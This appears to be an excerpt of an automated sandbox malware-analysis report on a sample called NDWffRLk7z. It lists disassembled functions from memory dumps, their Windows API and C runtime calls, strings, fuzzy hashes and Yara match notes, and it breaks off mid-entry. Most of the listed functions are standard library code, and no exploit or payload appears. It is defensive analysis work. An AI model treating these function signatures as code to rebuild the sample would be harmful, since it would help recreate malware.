WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,23E85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 004322FE
__freea.LIBCMT ref: 0043230B

Part of subcall function 00433697: RtlAllocateHeap.NTDLL(00000000,0040D866,00000000,?,0042678E,00000002,00000000,00000000,00000000,?,0040CD17,0040D866,00000004,00000000,00000000,00000000), ref: 004336C9

__freea.LIBCMT ref: 00432314
__freea.LIBCMT ref: 00432339

Memory Dump Source

Source File: 00000004.00000002.3743818688.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_NDWffRLk7z.jbxd

Similarity

API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocateHeap
String ID:
API String ID: 3864826663-0
Opcode ID: fc5e23a9969f5a0b3c987a42f5ffda192cc55ac5853a9877383f7c3e4280cf28
Instruction ID: ba832ad7ebe863b589d8a86c2aeb799e0d63014e0688505fe86a97fbdbb1aa79
Opcode Fuzzy Hash: fc5e23a9969f5a0b3c987a42f5ffda192cc55ac5853a9877383f7c3e4280cf28
Instruction Fuzzy Hash: DA51F572600216AFDB249F71DD41EAF77A9EB48754F14462AFD04E7240DBBCDC408668

Function 02141119 Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 266COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 02142131: GetLastError.KERNEL32(?,?,0213A9DC,?,00000000,?,0213CDD6,02112474,00000000,?,00451F20), ref: 02142135
Part of subcall function 02142131: _free.LIBCMT ref: 02142168
Part of subcall function 02142131: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 021421A9

_free.LIBCMT ref: 02141434
_free.LIBCMT ref: 0214144D
_free.LIBCMT ref: 0214147F
_free.LIBCMT ref: 02141488
_free.LIBCMT ref: 02141494

Strings

C, xrefs: 02141281

Memory Dump Source

Source File: 00000004.00000002.3752943059.0000000002110000.00000040.00001000.00020000.00000000.sdmp, Offset: 02110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2110000_NDWffRLk7z.jbxd

Yara matches

Similarity

API ID: _free$ErrorLast
String ID: C
API String ID: 3291180501-1037565863
Opcode ID: eed3b7bc2709ca3cbefa9e0eb2039d909a82c3add560d3625423817520cd7e58
Instruction ID: b69ccb303a1d1115f2b0dddbab869af5a806a83bb2870c9a5ff0e4d092c3b554
Opcode Fuzzy Hash: eed3b7bc2709ca3cbefa9e0eb2039d909a82c3add560d3625423817520cd7e58
Instruction Fuzzy Hash: 9DB12775A4121AAFDB24DF28C884BADB7B5FB08714F5445EAD91DA7350DB30AE90CF80

Function 0214A105 Relevance: 10.7, APIs: 7, Instructions: 204COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 0214A174
_free.LIBCMT ref: 0214A182
_free.LIBCMT ref: 0214A2B0
_free.LIBCMT ref: 0214A2BB

Memory Dump Source

Source File: 00000004.00000002.3752943059.0000000002110000.00000040.00001000.00020000.00000000.sdmp, Offset: 02110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2110000_NDWffRLk7z.jbxd

Yara matches

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 30d23d355d895f70cd8acfb134f092bcee01e0337bd1769fb6490f5a84f9f64a
Instruction ID: 9f3c254c4204a5dd8592b9cbef76d1157b172c85ba13b2d164c2302afe2e247e
Opcode Fuzzy Hash: 30d23d355d895f70cd8acfb134f092bcee01e0337bd1769fb6490f5a84f9f64a
Instruction Fuzzy Hash: 9861F171D80205AFDB20CF68C841B9ABBF5EF05720F2541AAED58EB251DF719941DF90

Function 00439E9E Relevance: 10.7, APIs: 7, Instructions: 204COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00439F0D
_free.LIBCMT ref: 00439F1B
_free.LIBCMT ref: 0043A049
_free.LIBCMT ref: 0043A054

Memory Dump Source

Source File: 00000004.00000002.3743818688.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_NDWffRLk7z.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 1c3dc1b9d9b3fad286da187fe857a54df99b30e252b8950e3012847a3cb02415
Instruction ID: 375e79c53d3bcaca8bdb11d34ea16f93cbcffeb35ab56cd023e7f34feda17694
Opcode Fuzzy Hash: 1c3dc1b9d9b3fad286da187fe857a54df99b30e252b8950e3012847a3cb02415
Instruction Fuzzy Hash: 2361F271D00205AFEB20DF69C842B9ABBF4EF0D710F14516BE888EB382E7759D418B59

Function 02143ADA Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMON

Download Yara Rule

APIs

GetConsoleCP.KERNEL32(?,0213C494,E0830C40,?,?,?,?,?,?,0214424F,0211E032,0213C494,?,0213C494,0213C494,0211E032), ref: 02143B1C
__fassign.LIBCMT ref: 02143B97
__fassign.LIBCMT ref: 02143BB2
WideCharToMultiByte.KERNEL32(?,00000000,0213C494,00000001,?,00000005,00000000,00000000), ref: 02143BD8
WriteFile.KERNEL32(?,?,00000000,0214424F,00000000,?,?,?,?,?,?,?,?,?,0214424F,0211E032), ref: 02143BF7
WriteFile.KERNEL32(?,0211E032,00000001,0214424F,00000000,?,?,?,?,?,?,?,?,?,0214424F,0211E032), ref: 02143C30

Memory Dump Source

Source File: 00000004.00000002.3752943059.0000000002110000.00000040.00001000.00020000.00000000.sdmp, Offset: 02110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2110000_NDWffRLk7z.jbxd

Yara matches

Similarity

API ID: FileWrite__fassign$ByteCharConsoleMultiWide
String ID:
API String ID: 1324828854-0
Opcode ID: e6aa7f8e09cc3bdd419a993f0e627323657b2fb42e9cf7c9360fe368da63a324
Instruction ID: 63e69c0240cd80c8539ea008f24bbaef3ed431037eb511e6daea3e8da4bf705c
Opcode Fuzzy Hash: e6aa7f8e09cc3bdd419a993f0e627323657b2fb42e9cf7c9360fe368da63a324
Instruction Fuzzy Hash: F351D774940209AFCB11CFA4DC84BEEBBF5EF09714F24416AE969E7391D7309641CB64

Function 00433873 Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetConsoleCP.KERNEL32(?,0042C22D,E0830C40,?,?,?,?,?,?,00433FE8,0040DDCB,0042C22D,?,0042C22D,0042C22D,0040DDCB), ref: 004338B5
__fassign.LIBCMT ref: 00433930
__fassign.LIBCMT ref: 0043394B
WideCharToMultiByte.KERNEL32(?,00000000,0042C22D,00000001,?,00000005,00000000,00000000), ref: 00433971
WriteFile.KERNEL32(?,?,00000000,00433FE8,00000000,?,?,?,?,?,?,?,?,?,00433FE8,0040DDCB), ref: 00433990
WriteFile.KERNEL32(?,0040DDCB,00000001,00433FE8,00000000,?,?,?,?,?,?,?,?,?,00433FE8,0040DDCB), ref: 004339C9

Memory Dump Source

Source File: 00000004.00000002.3743818688.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_NDWffRLk7z.jbxd

Similarity

API ID: FileWrite__fassign$ByteCharConsoleMultiWide
String ID:
API String ID: 1324828854-0
Opcode ID: d6e4a050a64bfb7ccc6b009322825ab70381fc19e65649eea91823c2b0319e50
Instruction ID: 0fd517cfdcf2aa173ba8fdea846c20396cfd97c89b6f08fd2475e7b61059f896
Opcode Fuzzy Hash: d6e4a050a64bfb7ccc6b009322825ab70381fc19e65649eea91823c2b0319e50
Instruction Fuzzy Hash: 7751C470E002099FCB20DFA8D845BEEBBF4EF09701F14412BE556E7291E774AA41CB69

Function 004286C0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 117COMMON

Download Yara Rule

APIs

_ValidateLocalCookies.LIBCMT ref: 004286EB
___except_validate_context_record.LIBVCRUNTIME ref: 004286F3
_ValidateLocalCookies.LIBCMT ref: 00428781
__IsNonwritableInCurrentImage.LIBCMT ref: 004287AC
_ValidateLocalCookies.LIBCMT ref: 00428801

Strings

csm, xrefs: 00428796

Memory Dump Source

Source File: 00000004.00000002.3743818688.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_NDWffRLk7z.jbxd

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 1170836740-1018135373
Opcode ID: be357bd56004c24e133951e3250c1e3ffc6610d741da1472be978505f667fff6
Instruction ID: 6873744b8b7164bb1b3b36c6b2f168add7434ae9e481f0ca892fbce792e2aca1
Opcode Fuzzy Hash: be357bd56004c24e133951e3250c1e3ffc6610d741da1472be978505f667fff6
Instruction Fuzzy Hash: 8C411934B012289BCF10DF29DC45A9F7BB0AF80328F64815FE8145B392DB399D15CB99

Function 02134AA4 Relevance: 10.6, APIs: 7, Instructions: 104threadCOMMON

Download Yara Rule

APIs

Concurrency::details::ThreadProxy::SuspendExecution.LIBCMT ref: 02134ABD

Part of subcall function 02134D8C: WaitForSingleObjectEx.KERNEL32(?,000000FF,00000000,00000000,021347F0), ref: 02134D9C

Concurrency::details::FreeVirtualProcessorRoot::ResetOnIdle.LIBCONCRT ref: 02134AD2
std::invalid_argument::invalid_argument.LIBCONCRT ref: 02134AE1
__CxxThrowException@8.LIBVCRUNTIME ref: 02134AEF
Concurrency::details::FreeVirtualProcessorRoot::Affinitize.LIBCONCRT ref: 02134B65
std::invalid_argument::invalid_argument.LIBCONCRT ref: 02134BA5
__CxxThrowException@8.LIBVCRUNTIME ref: 02134BB3

Memory Dump Source

Source File: 00000004.00000002.3752943059.0000000002110000.00000040.00001000.00020000.00000000.sdmp, Offset: 02110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2110000_NDWffRLk7z.jbxd

Yara matches

Similarity

API ID: Concurrency::details::$Exception@8FreeProcessorRoot::ThrowVirtualstd::invalid_argument::invalid_argument$AffinitizeExecutionIdleObjectProxy::ResetSingleSuspendThreadWait
String ID:
API String ID: 3151764488-0
Opcode ID: 3734a1ad1e391af5b1d37797e51a1a7898c33a57748dbc1e27873804117bc96e
Instruction ID: 1198b05310a7800ba185847f038276fbdb9b1f73a26a93050c8ef7436f599f92
Opcode Fuzzy Hash: 3734a1ad1e391af5b1d37797e51a1a7898c33a57748dbc1e27873804117bc96e
Instruction Fuzzy Hash: 31312935A402149FCF16EF64C880BAD77BBFF44310F244565E815A7285DB70EE01CB94

Function 0214FB98 Relevance: 10.6, APIs: 7, Instructions: 80COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3752943059.0000000002110000.00000040.00001000.00020000.00000000.sdmp, Offset: 02110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2110000_NDWffRLk7z.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 32159607c4063c2e90e18d1ced7cd03c6b33762cae1000625b4156809b17c3e4
Instruction ID: 79e4b0ab93a25d0eaec83d54e7c86106dc675a053ba6f2945700ddd85805641f
Opcode Fuzzy Hash: 32159607c4063c2e90e18d1ced7cd03c6b33762cae1000625b4156809b17c3e4
Instruction Fuzzy Hash: A311DA71585219BFDB252F769C08D5B7A6EEF827317110624FC1DD7250DF318601CAA0

Function 0043F931 Relevance: 10.6, APIs: 7, Instructions: 80COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3743818688.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_NDWffRLk7z.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 26fd24188a083ade74c1b847c8e385b80c443176beafc5e0d5befa98fb89b42a
Instruction ID: 6d10875eadbb656c302b38412db81507454656e5ad58498e79d080ea23809695
Opcode Fuzzy Hash: 26fd24188a083ade74c1b847c8e385b80c443176beafc5e0d5befa98fb89b42a
Instruction Fuzzy Hash: 54110D72A04215BFDB202FB79C05F6B7A5CEF89725F20163BF815C7241DA38890587A9

Function 0214A5DA Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0214A321: _free.LIBCMT ref: 0214A34A

_free.LIBCMT ref: 0214A628

Part of subcall function 021436C1: HeapFree.KERNEL32(00000000,00000000,?,0214A34F,?,00000000,?,00000000,?,0214A5F3,?,00000007,?,?,0214A9E7,?), ref: 021436D7
Part of subcall function 021436C1: GetLastError.KERNEL32(?,?,0214A34F,?,00000000,?,00000000,?,0214A5F3,?,00000007,?,?,0214A9E7,?,?), ref: 021436E9

_free.LIBCMT ref: 0214A633
_free.LIBCMT ref: 0214A63E
_free.LIBCMT ref: 0214A692
_free.LIBCMT ref: 0214A69D
_free.LIBCMT ref: 0214A6A8
_free.LIBCMT ref: 0214A6B3

Memory Dump Source

Source File: 00000004.00000002.3752943059.0000000002110000.00000040.00001000.00020000.00000000.sdmp, Offset: 02110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2110000_NDWffRLk7z.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: b7590f4111be71bf3afae53295ff9af9b533932b666efaf04c0ab8a9c80b4b90
Instruction ID: 94bcb744cc3157040b6525c280fc5ebbe710efc4675076dfd18cf2f31ecca53c
Opcode Fuzzy Hash: b7590f4111be71bf3afae53295ff9af9b533932b666efaf04c0ab8a9c80b4b90
Instruction Fuzzy Hash: 131121729C1B04BEDA20BBF1CD55FCB779EDF04704F814825A2ADA6160EF65BA148E90

Function 0043A373 Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0043A0BA: _free.LIBCMT ref: 0043A0E3

_free.LIBCMT ref: 0043A3C1

Part of subcall function 0043345A: HeapFree.KERNEL32(00000000,00000000,?,0043A0E8,?,00000000,?,00000000,?,0043A38C,?,00000007,?,?,0043A780,?), ref: 00433470
Part of subcall function 0043345A: GetLastError.KERNEL32(?,?,0043A0E8,?,00000000,?,00000000,?,0043A38C,?,00000007,?,?,0043A780,?,?), ref: 00433482

_free.LIBCMT ref: 0043A3CC
_free.LIBCMT ref: 0043A3D7
_free.LIBCMT ref: 0043A42B
_free.LIBCMT ref: 0043A436
_free.LIBCMT ref: 0043A441
_free.LIBCMT ref: 0043A44C

Memory Dump Source

Source File: 00000004.00000002.3743818688.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_NDWffRLk7z.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: b7590f4111be71bf3afae53295ff9af9b533932b666efaf04c0ab8a9c80b4b90
Instruction ID: 1a6205ac72ebf8d1688c9f65f809cb8e6d8ac8f7b7a09961daf7fc6283f763b0
Opcode Fuzzy Hash: b7590f4111be71bf3afae53295ff9af9b533932b666efaf04c0ab8a9c80b4b90
Instruction Fuzzy Hash: B6119032980704A7E522BFB2CC07FCB7BAD6F18305F40581EB6DA66052CA2CE5184B47

Function 02122649 Relevance: 10.6, APIs: 7, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLogicalProcessorInformation.KERNEL32(00000000,?,00000000,?,0000FFFF,00000000,?,00000000,?,02120D90,?,?,?,00000000), ref: 02122657
GetLastError.KERNEL32(?,0000FFFF,00000000,?,00000000,?,02120D90,?,?,?,00000000), ref: 0212265D
GetLogicalProcessorInformation.KERNEL32(00000000,?,?,0000FFFF,00000000,?,00000000,?,02120D90,?,?,?,00000000), ref: 0212268A
GetLastError.KERNEL32(?,0000FFFF,00000000,?,00000000,?,02120D90,?,?,?,00000000), ref: 02122694
GetLastError.KERNEL32(?,0000FFFF,00000000,?,00000000,?,02120D90,?,?,?,00000000), ref: 021226A6
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 021226BC
__CxxThrowException@8.LIBVCRUNTIME ref: 021226CA

Memory Dump Source

Source File: 00000004.00000002.3752943059.0000000002110000.00000040.00001000.00020000.00000000.sdmp, Offset: 02110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2110000_NDWffRLk7z.jbxd

Yara matches

Similarity

API ID: ErrorLast$InformationLogicalProcessor$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorException@8Throw
String ID:
API String ID: 4227777306-0
Opcode ID: 6bc3ccd81d67fd1a20a10fcda5f24da638e68139e84298e1693e69c500751e62
Instruction ID: 368160fe2c647ed2e08674bfec3fd523510c9b065a14c43df03c9e216ce0acb4
Opcode Fuzzy Hash: 6bc3ccd81d67fd1a20a10fcda5f24da638e68139e84298e1693e69c500751e62
Instruction Fuzzy Hash: 6701D43A580125AAD724BF61DC48BAF3769AF42B52B900435FC11E3150EB34D9188BE8

Function 004123E2 Relevance: 10.6, APIs: 7, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLogicalProcessorInformation.KERNEL32(00000000,?,00000000,?,0000FFFF,00000000,?,00000000,?,00410B29,?,?,?,00000000), ref: 004123F0
GetLastError.KERNEL32(?,0000FFFF,00000000,?,00000000,?,00410B29,?,?,?,00000000), ref: 004123F6
GetLogicalProcessorInformation.KERNEL32(00000000,?,?,0000FFFF,00000000,?,00000000,?,00410B29,?,?,?,00000000), ref: 00412423
GetLastError.KERNEL32(?,0000FFFF,00000000,?,00000000,?,00410B29,?,?,?,00000000), ref: 0041242D
GetLastError.KERNEL32(?,0000FFFF,00000000,?,00000000,?,00410B29,?,?,?,00000000), ref: 0041243F
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00412455
__CxxThrowException@8.LIBVCRUNTIME ref: 00412463

Memory Dump Source

Source File: 00000004.00000002.3743818688.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_NDWffRLk7z.jbxd

Similarity

API ID: ErrorLast$InformationLogicalProcessor$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorException@8Throw
String ID:
API String ID: 4227777306-0
Opcode ID: ba26f486df76d842dabe37b99459d44fccdc07bc3ddf0c1636ffc481c0617ea2
Instruction ID: 5cfb26a65153cc27f48dfa9c0f225a7cd51ea371121a2632e0d6d729d80d374e
Opcode Fuzzy Hash: ba26f486df76d842dabe37b99459d44fccdc07bc3ddf0c1636ffc481c0617ea2
Instruction Fuzzy Hash: 3201F738600121A7C720AF66ED09BEF3768AF42B52BA0443BF905D2151DBACD954866D

Function 02122494 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 46libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(kernel32.dll,?,00000000,00000000,?,?,?,021266FB), ref: 021224A6
GetProcAddress.KERNEL32(00000000,00446CDC), ref: 021224B4
GetProcAddress.KERNEL32(00000000,00446CF4), ref: 021224C2
GetModuleHandleW.KERNEL32(kernel32.dll,00446D0C,?,?,?,021266FB), ref: 021224F0
GetProcAddress.KERNEL32(00000000), ref: 021224F7
GetLastError.KERNEL32(?,?,?,021266FB), ref: 02122512
GetLastError.KERNEL32(?,?,?,021266FB), ref: 0212251E
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 02122534
__CxxThrowException@8.LIBVCRUNTIME ref: 02122542

Strings

kernel32.dll, xrefs: 021224A0, 021224A5, 021224EA

Memory Dump Source

Source File: 00000004.00000002.3752943059.0000000002110000.00000040.00001000.00020000.00000000.sdmp, Offset: 02110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2110000_NDWffRLk7z.jbxd

Yara matches

Similarity

API ID: AddressProc$ErrorHandleLastModule$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorException@8Throw
String ID: kernel32.dll
API String ID: 4179531150-1793498882
Opcode ID: 44ecf9bd0dd5c91555fe9cdf304f14bfeeea195f7c9b597a93ca8c7b2ae1de14
Instruction ID: f5dd8851c0b90ad387b338f3a2edc546ad7b6f569f110c5c61b5f9b87352c4fd
Opcode Fuzzy Hash: 44ecf9bd0dd5c91555fe9cdf304f14bfeeea195f7c9b597a93ca8c7b2ae1de14
Instruction Fuzzy Hash: D7F0A4769403203FF7113B797D9999E3FACDD46A233200636F811D26A2EB75C5148A68

Function 0040C60E Relevance: 10.5, APIs: 1, Strings: 5, Instructions: 37COMMON

Download Yara Rule

APIs

__CxxThrowException@8.LIBVCRUNTIME ref: 0040C66D

Strings

<(@, xrefs: 0040C647
<(@, xrefs: 0040C611
ios_base::badbit set, xrefs: 0040C630, 0040C650
ios_base::eofbit set, xrefs: 0040C63F
ios_base::failbit set, xrefs: 0040C63A

Memory Dump Source

Source File: 00000004.00000002.3743818688.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_NDWffRLk7z.jbxd

Similarity

API ID: Exception@8Throw
String ID: <(@$<(@$ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
API String ID: 2005118841-859722693
Opcode ID: 019f52a8e0bb9ff9f48767ebbe9764e79a713ad81fd208e44c7c6c06e0bc9c3a
Instruction ID: a061ea616c9574019159ec0f40f66c927ac9cef8fcde5d3cdfefebe65de0f9c0
Opcode Fuzzy Hash: 019f52a8e0bb9ff9f48767ebbe9764e79a713ad81fd208e44c7c6c06e0bc9c3a
Instruction Fuzzy Hash: 9FF0FCB2900204AAC714DB54CC42FAB33985B11744F14857BEE11B61C3DA7DAD05C79C

Function 02141981 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 30COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 0214199F

Part of subcall function 021436C1: HeapFree.KERNEL32(00000000,00000000,?,0214A34F,?,00000000,?,00000000,?,0214A5F3,?,00000007,?,?,0214A9E7,?), ref: 021436D7
Part of subcall function 021436C1: GetLastError.KERNEL32(?,?,0214A34F,?,00000000,?,00000000,?,0214A5F3,?,00000007,?,?,0214A9E7,?,?), ref: 021436E9

_free.LIBCMT ref: 021419B1
_free.LIBCMT ref: 021419C4
_free.LIBCMT ref: 021419D5
_free.LIBCMT ref: 021419E6

Strings

(], xrefs: 02141981, 02141990, 0214199E, 021419A5

Memory Dump Source

Source File: 00000004.00000002.3752943059.0000000002110000.00000040.00001000.00020000.00000000.sdmp, Offset: 02110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2110000_NDWffRLk7z.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast
String ID: (]
API String ID: 776569668-1768660302
Opcode ID: b228b96d46590c86949e27b4ef7eacf2620a314154de2a574f90fb6d598625a0
Instruction ID: dac52f1ea80db7b6d0616e8258d2e608fc3d68c004f01cfcd53508360f7553bf
Opcode Fuzzy Hash: b228b96d46590c86949e27b4ef7eacf2620a314154de2a574f90fb6d598625a0
Instruction Fuzzy Hash: EBF0D071C40351AF9F216F14FC804047B61AF1972271112A6F52A97372CB35D9A6DFDE

Function 0043171A Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 30COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00431738

Part of subcall function 0043345A: HeapFree.KERNEL32(00000000,00000000,?,0043A0E8,?,00000000,?,00000000,?,0043A38C,?,00000007,?,?,0043A780,?), ref: 00433470
Part of subcall function 0043345A: GetLastError.KERNEL32(?,?,0043A0E8,?,00000000,?,00000000,?,0043A38C,?,00000007,?,?,0043A780,?,?), ref: 00433482

_free.LIBCMT ref: 0043174A
_free.LIBCMT ref: 0043175D
_free.LIBCMT ref: 0043176E
_free.LIBCMT ref: 0043177F

Strings

(], xrefs: 0043171A, 00431729, 0043173E

Memory Dump Source

Source File: 00000004.00000002.3743818688.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_NDWffRLk7z.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID: (]
API String ID: 776569668-1768660302
Opcode ID: b228b96d46590c86949e27b4ef7eacf2620a314154de2a574f90fb6d598625a0
Instruction ID: 641b2a1348aedb00c037ff60dfb94c9ddf1ba1fe668fd8dfad71f65212485368
Opcode Fuzzy Hash: b228b96d46590c86949e27b4ef7eacf2620a314154de2a574f90fb6d598625a0
Instruction Fuzzy Hash: D8F03070C003109BAA236F15AC414053B60BF2D727B15626BF40697273CB38D952DF8E

Function 00430EB2 Relevance: 9.3, APIs: 6, Instructions: 266COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00431ECA: GetLastError.KERNEL32(?,?,0042DFD5,00457910,00000010), ref: 00431ECE
Part of subcall function 00431ECA: _free.LIBCMT ref: 00431F01
Part of subcall function 00431ECA: SetLastError.KERNEL32(00000000), ref: 00431F42

_memcmp.LIBVCRUNTIME ref: 0043115C
_free.LIBCMT ref: 004311CD
_free.LIBCMT ref: 004311E6
_free.LIBCMT ref: 00431218
_free.LIBCMT ref: 00431221
_free.LIBCMT ref: 0043122D

Memory Dump Source

Source File: 00000004.00000002.3743818688.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_NDWffRLk7z.jbxd

Similarity

API ID: _free$ErrorLast$_memcmp
String ID:
API String ID: 4275183328-0
Opcode ID: 1403a73044b2a32c4151c19e3ee42d3d20986d24228a641b3762fb9bf04db679
Instruction ID: e2129b0906de41222375811faf8a10f30bb0ce812e5bc895f935e357d1a7b262
Opcode Fuzzy Hash: 1403a73044b2a32c4151c19e3ee42d3d20986d24228a641b3762fb9bf04db679
Instruction Fuzzy Hash: BBB12975A012199FDB24DF18C894AAEB7B4FB18304F1086EEE949A7360D775AE90CF44

Function 0214238B Relevance: 9.2, APIs: 6, Instructions: 216COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,?,?,?,?,?,021425DC,00000001,00000001,?), ref: 021423E5
MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,021425DC,00000001,00000001,?,?,?,?), ref: 0214246B
WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,?,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 02142565
__freea.LIBCMT ref: 02142572

Part of subcall function 021438FE: RtlAllocateHeap.NTDLL(00000000,0211DACD,00000000), ref: 02143930

__freea.LIBCMT ref: 0214257B
__freea.LIBCMT ref: 021425A0

Memory Dump Source

Source File: 00000004.00000002.3752943059.0000000002110000.00000040.00001000.00020000.00000000.sdmp, Offset: 02110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2110000_NDWffRLk7z.jbxd

Yara matches

Similarity

API ID: ByteCharMultiWide__freea$AllocateHeap
String ID:
API String ID: 1414292761-0
Opcode ID: 011fbe7e6b9632404c7d9c1a6e466163715f947e1f03c273384449d8668b7b41
Instruction ID: 24545cb1a202e8fac3e737d0a613d3772d32fa26e606f8d2d43779e42083f144
Opcode Fuzzy Hash: 011fbe7e6b9632404c7d9c1a6e466163715f947e1f03c273384449d8668b7b41
Instruction Fuzzy Hash: 5D51B072A90216AFDB258F64CC64EFF77AAEB84654F154628FD08DB150EF34DC80CA90

Function 0213E409 Relevance: 9.2, APIs: 6, Instructions: 200COMMONLIBRARYCODE

Download Yara Rule

APIs

__cftoe.LIBCMT ref: 0213E435
__cftoe.LIBCMT ref: 0213E467

Memory Dump Source

Source File: 00000004.00000002.3752943059.0000000002110000.00000040.00001000.00020000.00000000.sdmp, Offset: 02110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2110000_NDWffRLk7z.jbxd

Yara matches

Similarity

API ID: __cftoe
String ID:
API String ID: 4189289331-0
Opcode ID: f585e4267acc06fdc3d0dd0e71bd3e0fb416072b74251e024126f50d702bbe84
Instruction ID: 2e3c1779404f447c58325b83f6091bee17854636ba925343a5df2c2d87c6740e
Opcode Fuzzy Hash: f585e4267acc06fdc3d0dd0e71bd3e0fb416072b74251e024126f50d702bbe84
Instruction Fuzzy Hash: D951FA77980305AFDF269F688C40BAE77ABAF4C334F244259F819E6191EF31D5018EA4

Function 0213301B Relevance: 9.1, APIs: 6, Instructions: 106COMMONLIBRARYCODE

Download Yara Rule

APIs

Concurrency::details::SchedulerBase::GetRealizedChore.LIBCONCRT ref: 02133041

Part of subcall function 02128AA2: RtlInterlockedPopEntrySList.NTDLL(?), ref: 02128AAD

SafeSQueue.LIBCONCRT ref: 0213305A
Concurrency::location::_Assign.LIBCMT ref: 0213311A
std::invalid_argument::invalid_argument.LIBCONCRT ref: 0213313B
__CxxThrowException@8.LIBVCRUNTIME ref: 02133149

Memory Dump Source

Source File: 00000004.00000002.3752943059.0000000002110000.00000040.00001000.00020000.00000000.sdmp, Offset: 02110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2110000_NDWffRLk7z.jbxd

Yara matches

Similarity

API ID: AssignBase::ChoreConcurrency::details::Concurrency::location::_EntryException@8InterlockedListQueueRealizedSafeSchedulerThrowstd::invalid_argument::invalid_argument
String ID:
